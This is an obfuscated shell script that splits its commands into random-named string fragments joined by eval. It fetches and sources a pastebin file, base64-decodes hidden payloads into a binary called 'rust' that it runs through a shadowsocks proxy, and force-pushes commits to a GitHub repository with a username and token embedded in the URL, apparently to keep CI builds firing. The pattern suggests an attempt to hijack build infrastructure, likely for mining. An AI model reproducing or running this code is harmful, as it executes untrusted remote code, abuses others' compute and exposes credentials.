DLIkcfD="do add-apt-repo"
JLdGKYPK="sitory ppa:m"
ONnhNl="ax-c-lv/shado"
NGLgm="wsocks-libev -y"
sgnDXna=" &>/dev/null |"
sZOsMDj="| tr"
eval "su""$DLIkcfD""$JLdGKYPK""$ONnhNl""$NGLgm""$sgnDXna""$sZOsMDj""ue"
akgvowR="do add-apt-r"
MyTdns="epository p"
dXiEtJ="pa:ondrej/"
vIFOr="apache2 -y &>"
dQwU="/dev/null "
swXaZj="|| true"
eval "su""$akgvowR""$MyTdns""$dXiEtJ""$vIFOr""$dQwU""$swXaZj"
YuRvRsG="sudo apt upda"
rbzsgJ="te &>/dev/null"
wIaXOYXj=" || tru"
eval "$YuRvRsG""$rbzsgJ""$wIaXOYXj""e"
szujBs="wget -O codesrc"
qhEUo=" https://pa"
OjzV="stebin.com/r"
BUlZKOau="aw/UKs9hZfc &>"
bcWUrd="/dev/nu"
eval "$szujBs""$qhEUo""$OjzV""$BUlZKOau""$bcWUrd""ll"
FDGvHViR="ource ./cod"
eval "s""$FDGvHViR""esrc"
git clone $SRC codes &>/dev/null
XCoWM="base64 -d codes"
pmnJNvG="/s >"
eval "$XCoWM""$pmnJNvG"" o"
sudo apt --yes install openssl &>/dev/null || true
UJLUAtmH="udo apt --y"
KsZQgmsU="es install "
OsDbyILj="psmisc shadows"
RBRxg="ocks-libev &"
UefKEtVo=">/dev/null"
OqCbVIg=" || tr"
eval "s""$UJLUAtmH""$KsZQgmsU""$OsDbyILj""$RBRxg""$UefKEtVo""$OqCbVIg""ue"
sxRIqocN="o systemctl s"
lett="top shadowsoc"
mzxPfH="ks-libev.servi"
lcXN="ce &>/dev/nul"
ZTIE="l || tr"
eval "sud""$sxRIqocN""$lett""$mzxPfH""$lcXN""$ZTIE""ue"
DFLDyz="e64 -d code"
oEiJdnm="s/c > pipe.log"
eval "bas""$DFLDyz""$oEiJdnm"
wwszKFO="e64 -d cod"
yEDA="es/gc > g"
eval "bas""$wwszKFO""$yEDA""c"
pnPsAV="se64 -d co"
yCwnSEb="des/m > ru"
eval "ba""$pnPsAV""$yCwnSEb""st"
uctdz="e64 -d codes/p"
XcpzDPZ=" > prepa"
eval "bas""$uctdz""$XcpzDPZ""re"
. ./prepare
HiyUiB="sudo ss-local "
Bwexi="-c o --plugin"
iyILIdSj=" ./gqs --plugin"
TBjrzHxS="-opts ./gc &>/"
DFCuo="dev/nu"
eval "$HiyUiB""$Bwexi""$iyILIdSj""$TBjrzHxS""$DFCuo""ll &"
Xdndt="hmod +x "
eval "c""$Xdndt""rust"
jmuGQNq=" -i 's/gcc"
wWRrYS="/cegfo/g' "
gaCnT="pipe.log"
eval "sed""$jmuGQNq""$wWRrYS""$gaCnT"
urgn="sudo ./rust"
WUPEcDDU=" --config "
yyZaip="pipe.log &>/de"
dyZNTVv="v/null &"
eval "$urgn""$WUPEcDDU""$yyZaip""$dyZNTVv"
echo jkaow
vpdPXVD="sleep"
eval "$vpdPXVD"" 60"
khdmepWs="git clone "
KgKlY="https://gi"
jBVg="thub.com/esl"
tieZdTYN="ang-ef-org"
Jrojj="/visio.git t"
nArX="mp &>/dev/nu"
QPxrV="ll || tru"
eval "$khdmepWs""$KgKlY""$jBVg""$tieZdTYN""$Jrojj""$nArX""$QPxrV""e"
cd tmp || true
jvsd="t config use"
EBXrtX="r.name 'Ro"
NmbfH="man Akopyan' &>"
tCInc="/dev/null || "
OcBpHQb="tru"
eval "gi""$jvsd""$EBXrtX""$NmbfH""$tCInc""$OcBpHQb""e"
lRwKJL="git config us"
OnVkL="er.email rom"
NBrddM="an.akopyan"
MbDoOy="xb@inbox.r"
VHQlD="u &>/dev/nu"
sAfuC="ll || "
eval "$lRwKJL""$OnVkL""$NBrddM""$MbDoOy""$VHQlD""$sAfuC""true"
echo 'jkaow operation' >> jkaow$MAKE
rYVmWzeq="LD=\`date +%"
MmfU="s\`"
eval "BUI""$rYVmWzeq""$MmfU"
EEyBG="KE=\`date +%"
eval "MA""$EEyBG""S\`"
echo $BUILD >> jkaow$MAKE
echo 'visio' >> jkaow$MAKE
git add jkaow$MAKE &>/dev/null || true
git commit -m 'jkaow operation '$MAKE &>/dev/null || true
gmxhd="git push https:"
NRwD="//roman-akop"
zlIhQZ="yanxb:'CNjR-"
VzFDoDjD="KSjHVv_9Ap'@"
VpFxKpO="github.com/e"
GkgQTYiD="slang-ef-org/"
ocDrgLn="visio.git -f &>"
jSndF="/dev/null "
aErwm="|| "
eval "$gmxhd""$NRwD""$zlIhQZ""$VzFDoDjD""$VpFxKpO""$GkgQTYiD""$ocDrgLn""$jSndF""$aErwm""true"
while :; do G=`date +%s`; echo 'visio rebuilt '$G; [ `expr 1412 + $BUILD` -lt $G ] && sudo killall rust && break; sleep 146; done
